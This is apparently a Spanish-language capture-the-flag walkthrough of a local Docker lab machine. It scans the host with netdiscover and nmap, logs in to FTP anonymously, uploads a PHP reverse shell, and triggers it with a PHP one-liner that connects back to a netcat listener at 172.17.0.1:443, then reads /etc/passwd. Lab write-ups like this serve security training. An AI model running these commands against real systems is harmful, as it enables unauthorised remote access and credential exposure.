anonymouspingu

Lo primero en ejecutar será un ifconfig para ver la interfaz que corresponda a Docker y su respectiva IP, ya con esto ¡vamos a darle!

Para realizar un barrido de las ip en dicho segmento, usaré netdiscover

sudo netdiscover -i docker0 -r 172.17.0.1/24

Con esto nos entrega la IP de la maquina con la que trabajaremos.

para revisar los puertos en dicha maquina usaremos Nmap:

sudo nmap -p- --min-rate 5000 -sS -sV 172.17.0.2

Dicha búsqueda nos devuelve dos puertos abiertos, el 21 y el 80, comenzaremos con el puerto 80.

al revisar la IP en nuestro navegador, nos aparecerá el siguiente sitio:

Ahora buscaremos archivos y carpetas en el sitio

No encontramos nada por el sitio web, así que nos toca ir a probar al FTP

como no tenemos ningún dato de acceso, probé con usuario anonymous, lo cual funcionó:

ftp [email protected]

Pruebo colar una imagen con put en la carpeta upload

put gengar.jpeg

Ya con esto, sabemos que el próximo paso es subir una reversehell en PHP.

Me creo el siguiente ReverseShell (sacada de revshells.com) y lo subo con put al igual que hice con la imagen de Gengar.

Así que si me voy a upload en el navegador para comprobar que se han subido correctamente los archivos, los cuales se verá así:

al tirar un whoami nos devuelve lo siguiente:

Ahora pasaremos el siguiente comando, mientras que en mi equipo activaré Netcat.

php -r '$sock=fsockopen("172.17.0.1",443);system("sh <&3 >&3 2>&3");'

sudo nc -lvnp 443

ahora ejecutaremos

script /dev/null -c bash

y posteriormente

cat /etc/passwd

Última actualización hace 8 horas